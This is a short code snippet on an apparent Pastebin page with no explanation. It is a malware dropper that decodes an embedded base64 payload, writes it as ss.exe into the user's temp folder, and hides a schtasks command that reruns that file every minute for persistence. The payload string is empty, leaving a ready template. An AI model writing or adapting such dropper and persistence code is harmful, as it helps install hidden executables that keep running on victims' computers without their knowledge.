Advertisement
Guest User

Untitled

a guest
Jun 14th, 2018
163
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. public void main()
  2. {
  3. string o = "";
  4. byte[] s = Convert.FromBase64String(o);
  5. System.IO.File.WriteAllBytes(Interaction.Environ("temp") + @"\ss.exe", s);
  6. Interaction.Shell("schtasks /create /sc minute /mo 1 /tn drp /tr /drp " + Interaction.Environ("temp") + @"\ss.exe", AppWinStyle.Hide);
  7. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement